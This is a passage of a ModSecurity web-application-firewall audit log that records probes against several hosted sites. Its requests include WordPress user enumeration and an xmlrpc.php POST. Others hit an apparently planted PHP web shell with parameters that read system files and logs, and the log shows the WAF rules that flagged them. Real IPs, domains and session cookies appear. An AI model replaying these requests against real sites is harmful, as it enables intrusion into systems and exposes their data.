"/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/apt/apt.conf found within ARGS:path: /etc/apt/apt.conf.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/apt/apt.conf" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/apt/apt.conf found within ARGS:path: /etc/apt/apt.conf.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE7LyAG_OhOIIVz6TXRrlQAAAAA"] Apache-Handler: application/x-httpd-php Stopwatch: 1749994440307628 5618 (- - -) Stopwatch2: 1749994440307628 5618; combined=2579, p1=416, p2=2001, p3=43, p4=42, p5=77, sr=105, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --4fe45d26-Z-- --21bc4c60-A-- [15/Jun/2025:19:05:12.961600 +0530] aE7MEA2U8ofTdsKp_yhXcQAAAAU 13.41.189.160 47538 127.0.0.1 7081 --21bc4c60-B-- GET ///wp-json/wp/v2/users/ HTTP/1.0 Host: www.rsda.in X-Real-IP: 13.41.189.160 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0 Referer: http://rsda.in///wp-json/wp/v2/users/ Accept-Encoding: gzip --21bc4c60-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 X-Robots-Tag: noindex Link: <https://www.rsda.in/wp-json/>; rel="https://api.w.org/" X-Content-Type-Options: nosniff Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type X-WP-Total: 1 X-WP-TotalPages: 1 Allow: GET Vary: Origin Connection: close Content-Type: application/json; charset=UTF-8 --21bc4c60-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.rsda.in|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.rsda.in|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "www.rsda.in"] [uri "/wp-json/wp/v2/users/"] [unique_id "aE7MEA2U8ofTdsKp_yhXcQAAAAU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/rsda.in/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749994512644236 317485 (- - -) Stopwatch2: 1749994512644236 317485; combined=2030, p1=378, p2=1545, p3=0, p4=0, p5=106, sr=100, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --21bc4c60-Z-- --1ad4290d-A-- [15/Jun/2025:19:06:47.080038 +0530] aE7MbvGquvQgFtcpmQJV8QAAAAE 209.97.165.86 55520 127.0.0.1 7081 --1ad4290d-B-- GET //wp-json/wp/v2/users/ HTTP/1.0 Host: www.3econcepts.com X-Real-IP: 209.97.165.86 X-Accel-Internal: /internal-nginx-static-location Connection: close Cookie: wordpress_test_cookie=WP%20Cookie%20check User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 --1ad4290d-F-- HTTP/1.1 401 Unauthorized X-Powered-By: PHP/8.3.22 X-Robots-Tag: noindex Link: <https://www.3econcepts.com/wp-json/>; rel="https://api.w.org/" X-Content-Type-Options: nosniff Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type Allow: GET Vary: Origin Connection: close Content-Type: application/json; charset=UTF-8 --1ad4290d-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.3econcepts.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.3econcepts.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "www.3econcepts.com"] [uri "/wp-json/wp/v2/users/"] [unique_id "aE7MbvGquvQgFtcpmQJV8QAAAAE"] Apache-Handler: proxy:unix:/var/www/vhosts/system/3econcepts.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749994606311390 768721 (- - -) Stopwatch2: 1749994606311390 768721; combined=2255, p1=358, p2=1810, p3=0, p4=0, p5=86, sr=109, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --1ad4290d-Z-- --aeb3fc19-A-- [15/Jun/2025:19:06:55.052150 +0530] aE7MdlA3y-oVjWA7wCAzqgAAABA 209.97.165.86 59244 127.0.0.1 7081 --aeb3fc19-B-- POST //xmlrpc.php HTTP/1.0 Host: www.3econcepts.com X-Real-IP: 209.97.165.86 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 484 Cookie: wordpress_test_cookie=WP%20Cookie%20check User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --aeb3fc19-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --aeb3fc19-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 209.97.165.86 (+1 hits since last alert)|www.3econcepts.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 209.97.165.86 (+1 hits since last alert)|www.3econcepts.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "www.3econcepts.com"] [uri "/xmlrpc.php"] [unique_id "aE7MdlA3y-oVjWA7wCAzqgAAABA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/3econcepts.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749994614251193 801023 (- - -) Stopwatch2: 1749994614251193 801023; combined=2551, p1=396, p2=1796, p3=71, p4=37, p5=160, sr=113, sw=91, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --aeb3fc19-Z-- --03bbff14-A-- [15/Jun/2025:19:07:12.731745 +0530] aE7MiHrzia-Xuz8LZxRWpwAAAAg 172.69.128.141 39260 127.0.0.1 7081 --03bbff14-B-- GET /wp-json/wp/v2/users/1 HTTP/1.0 Host: www.getcalley.com X-Real-IP: 172.69.128.141 X-Forwarded-For: 2a06:c701:9fc4:6300:906b:c60:8d13:9e55 Connection: close cf-ray: 950275f5efbf36f8-TLV cdn-loop: cloudflare; loops=1 user-agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko accept-encoding: gzip, br x-forwarded-proto: https cf-ipcountry: IL cf-connecting-ip: 2a06:c701:9fc4:6300:906b:c60:8d13:9e55 cf-visitor: {"scheme":"https"} --03bbff14-F-- HTTP/1.1 302 Found X-Powered-By: PHP/8.2.28 location: https://safe-load.gotmls.net/report.php?ver=4.23.81&attack[]=FW_usersAPI&SERVER_REMOTE_ADDR=172.69.128.141&SERVER_HTTP_HOST=www.getcalley.com&SERVER_REQUEST_URI=%2Fwp-json%2Fwp%2Fv2%2Fusers%2F1&SERVER_HTTP_USER_AGENT=Mozilla%2F5.0+%28Windows+NT+10.0%3B+WOW64%3B+Trident%2F7.0%3B+rv%3A11.0%29+like+Gecko Vary: Accept-Encoding Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 --03bbff14-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.getcalley.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.getcalley.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "www.getcalley.com"] [uri "/wp-json/wp/v2/users/1"] [unique_id "aE7MiHrzia-Xuz8LZxRWpwAAAAg"] Apache-Handler: proxy:unix:/var/www/vhosts/system/getcalley.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749994632707840 23982 (- - -) Stopwatch2: 1749994632707840 23982; combined=1848, p1=319, p2=1426, p3=0, p4=0, p5=102, sr=87, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --03bbff14-Z-- --8e1e050e-A-- [15/Jun/2025:19:14:08.629091 +0530] aE7OKAGF7u34THrsb8uYfgAAAAM 54.235.125.129 37822 127.0.0.1 7081 --8e1e050e-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//var/log&viewfile=//var/log/syslog.2.gz HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 54.235.125.129 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --8e1e050e-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2948 Connection: close Content-Type: text/html; charset=UTF-8 --8e1e050e-H-- Message: Warning. Matched phrase "var/log/syslog" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/syslog found within ARGS:viewfile: /var/log/syslog.2.gz"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "var/log/syslog" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/syslog found within ARGS:viewfile: /var/log/syslog.2.gz"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE7OKAGF7u34THrsb8uYfgAAAAM"] Apache-Handler: application/x-httpd-php Stopwatch: 1749995048624945 4233 (- - -) Stopwatch2: 1749995048624945 4233; combined=2302, p1=349, p2=1825, p3=37, p4=35, p5=56, sr=96, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --8e1e050e-Z-- --c675b069-A-- [15/Jun/2025:19:17:27.873815 +0530] aE7O7wG_OhOIIVz6TXRsuwAAAAA 52.71.216.196 60544 127.0.0.1 7081 --c675b069-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//etc/ld.so.conf.d&viewfile=//etc/ld.so.conf.d/libc.conf HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 52.71.216.196 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --c675b069-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2979 Connection: close Content-Type: text/html; charset=UTF-8 --c675b069-H-- Message: Warning. Matched phrase "etc/ld.so.conf" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/ld.so.conf found within ARGS:path: /etc/ld.so.conf.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/ld.so.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/ld.so.conf found within ARGS:viewfile: /etc/ld.so.conf.d/libc.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/ld.so.conf" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/ld.so.conf found within ARGS:path: /etc/ld.so.conf.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE7O7wG_OhOIIVz6TXRsuwAAAAA"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/ld.so.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/ld.so.conf found within ARGS:viewfile: /etc/ld.so.conf.d/libc.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE7O7wG_OhOIIVz6TXRsuwAAAAA"] Apache-Handler: application/x-httpd-php Stopwatch: 1749995247869172 4708 (- - -) Stopwatch2: 1749995247869172 4708; combined=2630, p1=355, p2=2113, p3=38, p4=36, p5=88, sr=93, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c675b069-Z-- --2b38805b-A-- [15/Jun/2025:19:33:56.465275 +0530] aE7SywGF7u34THrsb8uZ6wAAAAM 3.140.195.167 35088 127.0.0.1 7081 --2b38805b-B-- POST /?ob=open-bridge/events HTTP/1.0 Host: www.retaxis.com X-Real-IP: 3.140.195.167 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 415 pragma: no-cache cache-control: no-cache user-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; ClaudeBot/1.0; +claudebot@anthropic.com) content-type: text/plain;charset=UTF-8 accept: */* origin: https://www.retaxis.com sec-fetch-site: same-origin sec-fetch-mode: cors sec-fetch-dest: empty referer: https://www.retaxis.com/6-errors-hampering-growth-of-your-e-commerce-website/ accept-encoding: gzip, deflate, br cookie: _gcl_au=1.1.2058802062.1749996233; _ga_PETSZCXF5J=GS2.1.s1749996233$o1$g1$t1749996233$j60$l0$h0; _sfs_id=717c6ff813b4638bfa337be99a66240d1749996233; _fbp=fb.1.1749996234716.562026760998328067; _ga=GA1.2.952413925.1749996234; _gid=GA1.2.2060176802.1749996235; _gat_UA-11096829-6=1 --2b38805b-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.2.28 Vary: Origin,Accept-Encoding Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: https://www.retaxis.com Access-Control-Allow-Credentials: true Access-Control-Max-Age: 86400 Set-Cookie: PHPSESSID=cb1251070dtstn4s11opfg65s2; expires=Sat, 13 Sep 2025 14:03:56 GMT; Max-Age=7776000; path=/; domain=www.retaxis.com; HttpOnly; SameSite=lax Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 --2b38805b-E-- --2b38805b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||www.retaxis.com|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Message: Warning. Operator GE matched 5 at TX:incoming_points. [file "/etc/apache2/modsecurity.d/rules/comodo_free/20_Outgoing_FiltersEnd.conf"] [line "35"] [id "214930"] [rev "1"] [msg "COMODO WAF: Inbound Points Exceeded|Total Incoming Points: 5|www.retaxis.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "FiltersEnd"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||www.retaxis.com|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.retaxis.com"] [uri "/"] [unique_id "aE7SywGF7u34THrsb8uZ6wAAAAM"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator GE matched 5 at TX:incoming_points. [file "/etc/apache2/modsecurity.d/rules/comodo_free/20_Outgoing_FiltersEnd.conf"] [line "35"] [id "214930"] [rev "1"] [msg "COMODO WAF: Inbound Points Exceeded|Total Incoming Points: 5|www.retaxis.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "FiltersEnd"] [hostname "www.retaxis.com"] [uri "/index.php"] [unique_id "aE7SywGF7u34THrsb8uZ6wAAAAM"] Apache-Handler: proxy:unix:/var/www/vhosts/system/retaxis.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749996235148468 1316933 (- - -) Stopwatch2: 1749996235148468 1316933; combined=3165, p1=332, p2=2519, p3=141, p4=36, p5=137, sr=117, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache WebApp-Info: "default" "1749996234" "-" Engine-Mode: "DETECTION_ONLY" --2b38805b-Z-- --1290573f-A-- [15/Jun/2025:19:34:19.789532 +0530] aE7S4gGF7u34THrsb8uZ8QAAAAM 3.140.195.167 37214 127.0.0.1 7081 --1290573f-B-- POST /?ob=open-bridge/events HTTP/1.0 Host: www.retaxis.com X-Real-IP: 3.140.195.167 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 468 pragma: no-cache cache-control: no-cache user-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; ClaudeBot/1.0; +claudebot@anthropic.com) content-type: text/plain;charset=UTF-8 accept: */* origin: https://www.retaxis.com sec-fetch-site: same-origin sec-fetch-mode: cors sec-fetch-dest: empty referer: https://www.retaxis.com/6-errors-hampering-growth-of-your-e-commerce-website/ accept-encoding: gzip, deflate, br cookie: _gcl_au=1.1.2058802062.1749996233; _ga_PETSZCXF5J=GS2.1.s1749996233$o1$g1$t1749996233$j60$l0$h0; _sfs_id=717c6ff813b4638bfa337be99a66240d1749996233; _fbp=fb.1.1749996234716.562026760998328067; _ga=GA1.2.952413925.1749996234; _gid=GA1.2.2060176802.1749996235; _gat_UA-11096829-6=1; PHPSESSID=cb1251070dtstn4s11opfg65s2 --1290573f-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.2.28 Vary: Origin,Accept-Encoding Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: https://www.retaxis.com Access-Control-Allow-Credentials: true Access-Control-Max-Age: 86400 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 --1290573f-E-- --1290573f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||www.retaxis.com|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Message: Warning. Operator GE matched 5 at TX:incoming_points. [file "/etc/apache2/modsecurity.d/rules/comodo_free/20_Outgoing_FiltersEnd.conf"] [line "35"] [id "214930"] [rev "1"] [msg "COMODO WAF: Inbound Points Exceeded|Total Incoming Points: 5|www.retaxis.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "FiltersEnd"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||www.retaxis.com|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.retaxis.com"] [uri "/"] [unique_id "aE7S4gGF7u34THrsb8uZ8QAAAAM"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator GE matched 5 at TX:incoming_points. [file "/etc/apache2/modsecurity.d/rules/comodo_free/20_Outgoing_FiltersEnd.conf"] [line "35"] [id "214930"] [rev "1"] [msg "COMODO WAF: Inbound Points Exceeded|Total Incoming Points: 5|www.retaxis.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "FiltersEnd"] [hostname "www.retaxis.com"] [uri "/index.php"] [unique_id "aE7S4gGF7u34THrsb8uZ8QAAAAM"] Apache-Handler: proxy:unix:/var/www/vhosts/system/retaxis.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749996258509658 1280003 (- - -) Stopwatch2: 1749996258509658 1280003; combined=5825, p1=579, p2=4949, p3=104, p4=37, p5=156, sr=161, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache WebApp-Info: "default" "1749996234" "-" Engine-Mode: "DETECTION_ONLY" --1290573f-Z-- --8699ec20-A-- [15/Jun/2025:19:41:20.176380 +0530] aE7UiFu1-lKBbvo2E9pQnwAAAAw 54.225.81.20 45502 127.0.0.1 7081 --8699ec20-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//etc/init.d&viewfile=//etc/init.d/keyboard-setup.sh HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 54.225.81.20 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --8699ec20-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3510 Connection: close Content-Type: text/html; charset=UTF-8 --8699ec20-H-- Message: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /etc/init.d/keyboard-setup.sh"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE7UiFu1-lKBbvo2E9pQnwAAAAw"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /etc/init.d/keyboard-setup.sh"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE7UiFu1-lKBbvo2E9pQnwAAAAw"] Apache-Handler: application/x-httpd-php Stopwatch: 1749996680171587 4886 (- - -) Stopwatch2: 1749996680171587 4886; combined=2661, p1=432, p2=2039, p3=45, p4=39, p5=106, sr=112, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --8699ec20-Z-- --fd73021b-A-- [15/Jun/2025:19:41:29.102601 +0530] aE7UkAGF7u34THrsb8uagAAAAAM 128.199.112.101 45824 127.0.0.1 7081 --fd73021b-B-- GET //wp-json/wp/v2/users/ HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 --fd73021b-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 X-Robots-Tag: noindex Link: <https://best-website-designs.com/wp-json/>; rel="https://api.w.org/" X-Content-Type-Options: nosniff Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type X-WP-Total: 2 X-WP-TotalPages: 1 Allow: GET Vary: Origin Connection: close Content-Type: application/json; charset=UTF-8 --fd73021b-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line 